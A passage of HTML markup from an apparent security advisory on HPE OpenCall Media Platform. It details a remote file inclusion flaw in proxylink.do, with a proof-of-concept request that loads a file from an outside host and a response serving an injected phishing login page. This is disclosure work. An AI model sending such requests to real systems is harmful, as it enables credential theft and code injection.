class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-85\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-86\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;8&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-87\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;8&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">No <\/span><span class=\"crayon-e\">Items <\/span><span class=\"crayon-v\">Found<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-89\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-90\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-91\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TABLE<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-92\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">BODY<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-93\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">HTML<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0224 seconds] -->  <\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/event.do-XSS.png\" data-slb-active=\"1\" data-slb-asset=\"1477965675\" data-slb-internal=\"0\" data-slb-group=\"3087\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3091\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/event.do-XSS-300x169.png\" alt=\"\" width=\"300\" height=\"169\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/event.do-XSS-300x169.png 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/event.do-XSS-768x432.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/event.do-XSS-1024x576.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>VoiceXML Administration Tool &#8211; <em>proxylink.do<\/em> function<\/strong><br \/> HPE OpenCall Media Platform (OCMP) does not sanitize <em>proxylink.do<\/em> function parameters input. An attacker can inject malicious URL to including remote files. After the attacker include the file, the HPE OpenCall Media Platform will parse and execute the content of the file.<\/p>\n<p>The vulnerable URL: <em>\/om\/proxylink.do?url=<strong>Remote File Inclusion Here (RFI)<\/strong><\/em><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p>An Attacker send the following GET request to the victims machine:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da8361a813771870\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> GET \/om\/proxylink.do?url=http:\/\/172.27.120.220:9595\/fruuuuk.txt HTTP\/1.1  Accept: text\/html, application\/xhtml+xml, *\/*  Accept-Language: en-GB  User-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko  Accept-Encoding: gzip, deflate  Host: 172.27.116.32:5443  DNT: 1  Connection: Keep-Alive  Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8361a813771870-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8361a813771870-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8361a813771870-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8361a813771870-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8361a813771870-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8361a813771870-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8361a813771870-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da8361a813771870-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da8361a813771870-9\">9<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da8361a813771870-1\"><span class=\"crayon-v\">GET<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">om<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">proxylink<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/172.27.120.220:9595\/fruuuuk.txt HTTP\/1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8361a813771870-2\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8361a813771870-3\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">GB<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8361a813771870-4\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Trident<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">7.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">11.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-e\">Gecko<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8361a813771870-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8361a813771870-6\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">172.27.116.32<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">5443<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8361a813771870-7\"><span class=\"crayon-v\">DNT<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da8361a813771870-8\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Keep<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">Alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da8361a813771870-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">JSESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">5D8C311BBE2784FB2CE6DB970878D3CA<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0031 seconds] -->  <\/p>\n<p>The server will respond with:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58fe79da83622112710773\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Server: Apache-Coyote\/1.1  Pragma: No-cache  Cache-Control: no-cache  Expires: Thu, 01 Dec 1994 16:00:00 GMT  Content-Type: text\/html;charset=ISO-8859-1  Content-Length: 2565  Date: Wed, 09 Sep 2015 13:00:53 GMT    &lt;!DOCTYPE HTML PUBLIC &#8220;-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN&#8221;&gt;  &lt;html&gt;  &lt;head&gt;  \t  \t&lt;title&gt;PHISHING LOGIN PAGE&lt;\/title&gt;  \t&lt;meta http-equiv=&#8221;Content-Type&#8221; content=&#8221;text\/html; charset=US-ASCII&#8221;&gt;  \t&lt;link rel=&#8221;Shortcut Icon&#8221; href=&#8221;\/login\/images\/hp.ico&#8221;&gt;  \t  \t&lt;script&gt;\t  \t\tfunction onLoginFornLoad() {  \t\t    document.getElementById(&#8220;txtUsername&#8221;).focus();  \t\t}  \t&lt;\/script&gt;\t      &lt;style type=&#8221;text\/css&#8221;&gt;          .style1          {              width: 290px;          }          .style2          {              width: 285px;          }      &lt;\/style&gt;  &lt;\/head&gt;    &lt;body onload=&#8221;onLoginFornLoad()&#8221;&gt;  &lt;h2&gt;PHISHING LOGIN PAGE&lt;\/h2&gt;  &lt;script&gt;document.write(&#8220;I`m also running JS&#8221;);&lt;\/script&gt;  &lt;form action=&#8221;j_security_check&#8221; method=&#8221;POST&#8221;&gt;  \t&lt;table cellpadding=&#8221;0&#8243; cellspacing=&#8221;0&#8243; width=&#8221;100%&#8221; height=&#8221;100%&#8221; style=&#8221;background-color: #ffffff&#8221;&gt;  \t&lt;tr&gt;  \t    &lt;td align=&#8221;center&#8221; valign=&#8221;middle&#8221;&gt;  \t        &lt;table cellpadding=&#8221;0&#8243; cellspacing=&#8221;0&#8243; height=&#8221;309&#8243;                   style=&#8221;border: 1px solid #000000; background-position: left top; background-image:url(&#8216;\/login\/images\/hp_logo.png&#8217;); background-repeat: no-repeat; width: 576px; clip: rect(1px, auto, auto, auto);&#8221; &gt;  \t        &lt;tr&gt;  \t            &lt;td class=&#8221;style2&#8243;&gt;&amp;nbsp;&lt;\/td&gt;  \t            &lt;td class=&#8221;style1&#8243;&gt;  \t\t\t&lt;table cellpadding=&#8221;0&#8243; cellspacing=&#8221;0&#8243;&gt;  \t                &lt;tr&gt;  \t                    &lt;td width=&#8221;60&#8243;                               style=&#8221;font-family: Arial, Helvetica, sans-serif; color: #000000; font-weight: bold&#8221;&gt;                              User&amp;nbsp;Name&amp;nbsp;&amp;nbsp;&lt;\/td&gt;  \t                    &lt;td&gt;&lt;input name=&#8221;j_username&#8221; type=&#8221;text&#8221; size=&#8221;14&#8243; style=&#8221;width: 193px;&#8221;                                   id=&#8221;txtUsername&#8221; value=&#8221;&#8221;&gt;&lt;\/td&gt;  \t                &lt;\/tr&gt;  \t                &lt;tr&gt;&lt;td colspan=&#8221;2&#8243; height=&#8221;3&#8243;&gt;&lt;\/td&gt;&lt;\/tr&gt;  \t                &lt;tr&gt;  \t                    &lt;td style=&#8221;font-family: Arial, Helvetica, sans-serif; font-weight: bold&#8221;&gt;Password&amp;nbsp;&lt;\/td&gt;  \t                    &lt;td&gt;&lt;input name=&#8221;j_password&#8221; type=&#8221;password&#8221; size=&#8221;14&#8243; style=&#8221;width: 191px&#8221;&gt;&lt;\/td&gt;  \t                &lt;\/tr&gt;  \t                &lt;tr&gt;&lt;td colspan=&#8221;2&#8243; height=&#8221;3&#8243;&gt;&lt;\/td&gt;&lt;\/tr&gt;  \t\t\t&lt;tr&gt;&lt;td colspan=&#8221;2&#8243;&gt;&amp;nbsp;&lt;\/td&gt;&lt;\/tr&gt;  \t                    &lt;td colspan=&#8221;2&#8243; align=&#8221;right&#8221;&gt;  \t                        &lt;button type=&#8221;submit&#8221;  value=&#8221;Log in&#8221; style=&#8221;width:54px; margin-top:8px&#8221;&gt;Login&lt;\/button&gt;  \t                    &lt;\/td&gt;  \t                &lt;\/tr&gt;  \t                &lt;\/table&gt;  \t            &lt;\/td&gt;  \t            &lt;td style=&#8221;background-color: #FFFFFF&#8221;&gt;&amp;nbsp;&lt;\/td&gt;  \t        &lt;\/tr&gt;  \t        &lt;\/table&gt;  \t    &lt;\/td&gt;  \t&lt;\/tr&gt;  \t&lt;\/table&gt;  &lt;\/form&gt;  &lt;\/body&gt;  &lt;\/html&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58fe79da83622112710773-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58fe79da83622112710773-76\">76<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-2\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Apache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Coyote<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-3\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">No<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83622112710773-4\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83622112710773-5\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">01<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Dec<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1994<\/span><span class=\"crayon-h\"> 